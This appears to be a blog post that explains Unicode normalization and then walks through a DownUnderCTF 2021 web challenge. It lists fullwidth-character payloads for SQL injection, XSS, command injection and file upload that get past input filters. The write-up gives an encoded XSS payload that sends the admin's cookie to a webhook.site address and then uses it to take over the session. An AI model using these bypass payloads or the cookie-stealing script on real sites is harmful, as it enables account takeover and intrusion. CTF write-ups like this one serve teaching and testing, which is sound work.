What is Unicode?
Unicode or formally Unicode Standard is an information technology standard for the consistent encoding, representation, and handling of text expressed in most of the world’s writing systems.
For example, “A” is mapped to U+0041, and “a” is mapped to U+0061. Unicode characters exist from U+000000 to U+10FFFF (there are more than a million symbols). Unicode divides all these possible symbols into “planes”, the best known is the BMP (Basic Multilingual Plane) that goes from U+0000 to U+FFFF (it is the Unicode plane number 1, there are 16 more, called “astral planes”).
The Unicode characters of the so-called “astral” planes can also be represented as “surrogate pairs” in UTF-16. Read more
Unicode equivalence or Unicode normalization is the specification by the Unicode character encoding standard that some sequences of code points represent essentially the same character. On a more technical level, normalization ensures two strings that may use a different binary representation for their characters have the same binary value after normalization.
Canonical equivalent characters are assumed to have the same appearance and meaning when printed or displayed.
Compatibility equivalence is a weaker equivalence, in that two values may represent the same abstract character but can be displayed differently.
There are 4 Normalization algorithms defined by the Unicode standard; NFC, NFD, NFKD and NFKC, each applies Canonical and Compatibility normalization techniques in a different way. You can read more on the different techniques at unicode.org.
- NFC: Normalization Form Canonical Composition
- NFD: Normalization Form Canonical Decomposition
- NFKC: Normalization Form Compatibility Composition
- NFKD: Normalization Form Compatibility Decomposition
The general idea behind all of these algorithms is to “normalize” some code points to end up having the same character.
What is the impact?
What can we, as attackers do with Unicode?
|＇(U+FF07)||＇ or ＇1＇=＇1||’ or ‘1’=’1|
|＂(U+FF02)||＂ or ＂1＂=＂1||” or “1”=”1|
Server-Side Request Forgery - SSRF
Cross Site Scripting - XSS
|＜(U+FF1C)||＜script src=a／＞||＜script src=a/>|
Template Injection - SSTI and CSTI
OS Command Injection
|｜ (U+FF5C)||｜｜ whoami|
- Arbitrary file upload
|ｐ (U+FF50) ʰ (U+02B0)||shell.ｐʰｐ||shell.php|
Chain reaction writeup from DownUnderCTF 2021
Upon visiting the main page, we see an option to register or login:
Register whatever account and login:
After logging in, we are presented with the option to visit our profile in the upper right corner of the page:
On our profile page, we’re able to update our username and “About me” text with the ability to report the current page to admin:
This might be an opportunity to XSS the page, but after inserting
<script>alert(1)</script> I get redirected to this page:
At this point, we know that some kind of input sanitization or character black listing is being performed. After trial and error, I decided to try encoding blacklisted characters with Unicode equivalents. Unicode Normalization reference table
I intercepted the update information request in Burp Suite and successfully broke out of HTML by injecting
""> test in Unicode format and escaped from the HTML:
%ef%bc%82%ef%bc%82%ef%b9%a5%ef%b9%a4scri%e1%b5%96t%ef%b9%a5 var i = new Image(); i.src='https://webhook.site/MYID?' %2b btoa(document.cookie) %ef%b9%a4/scri%e1%b5%96t%ef%b9%a5
Which translates to:
Here I am creating a new image element and setting its
src attribute to point to an online webhook link I created and appending user’s cookie, using
document.cookie function and encoding it to base64 using
script keyword is blacklisted and I had to replace
p with Unicode equivalent.
After pressing “Report Error” button on the page, my webhook came with appended base64 value:
Decoding base64 we get
I applied the cookie to my current session by opening developer tools and executing the following:
document.cookie = "admin-cookie=COOKIE_VALUE"
Now we are able to access /admin endpoint which holds the flag: